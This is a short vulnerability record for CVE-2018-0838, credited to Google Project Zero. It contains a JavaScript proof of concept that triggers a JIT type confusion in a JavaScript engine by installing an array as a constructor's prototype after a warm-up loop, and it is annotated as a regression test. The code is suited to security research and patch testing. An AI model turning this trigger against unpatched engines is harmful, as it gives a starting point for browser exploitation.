
CVE-2018-0838.md


CVE-2018-0838

  • Fix: Feb 2018
  • Credit: lokihardt of Google Project Zero

PoC

/**
 * Empty constructor that `opt` invokes with `new`.
 *
 * It has no body, so the only effect of `new inlinee()` is the creation of an
 * object whose prototype is whatever `inlinee.prototype` holds at that moment.
 * NOTE(review): the name suggests it is kept empty so that the JIT inlines the
 * call into `opt`. Confirm against the original report.
 */
function inlinee() {

}

/**
 * Function under test: two stores to `arr[0]` with a `new inlinee()` between
 * them. The statement order is the point of the test case; do not reorder.
 *
 * @param {Array} arr - array whose first element is overwritten; `main`
 *     passes a one-element array holding the double 1.1.
 */
function opt(arr) {
    // First store of a double into element 0.
    arr[0] = 1.1;
    // Constructs an object using the current `inlinee.prototype`. On the last
    // call made by `main`, that prototype is `arr` itself.
    // NOTE(review): presumably the optimized code assumed this construction
    // could not change how `arr` stores its elements. Confirm against the
    // vendor fix for this CVE.
    new inlinee();
    // Second store. 2.3023e-320 is a subnormal double whose raw 64-bit pattern
    // is the small integer 0x1234, which makes it easy to recognise when
    // triaging a crash dump from an unpatched build.
    arr[0] = 2.3023e-320;
}

/**
 * Test driver: calls `opt` 10000 times with a plain-object prototype, then
 * once with the array itself installed as `inlinee.prototype`.
 *
 * By JavaScript semantics `arr[0]` must read back as the number 2.3023e-320
 * at the end. Used as a regression test, a fixed engine should complete and
 * output that value; a crash or a different value points to a build that
 * still lacks the Feb 2018 fix.
 * No call to `main` is visible in this listing.
 */
function main() {
    let arr = [1.1];
    // Warm-up loop: the prototype is reset to a fresh empty object before
    // every call, so `opt` only ever sees an ordinary object as the prototype.
    // NOTE(review): 10000 iterations is presumably chosen to get `opt`
    // JIT-compiled; the actual threshold depends on the engine.
    for (let i = 0; i < 10000; i++) {
        inlinee.prototype = {};
        opt(arr);
    }

    // Final call: the array passed to `opt` is now also the prototype used by
    // `new inlinee()` inside `opt`.
    inlinee.prototype = arr;
    opt(arr);

    // `print` is not defined in this listing; presumably it is the output
    // function of the engine's command-line shell.
    print(arr);
}

Reference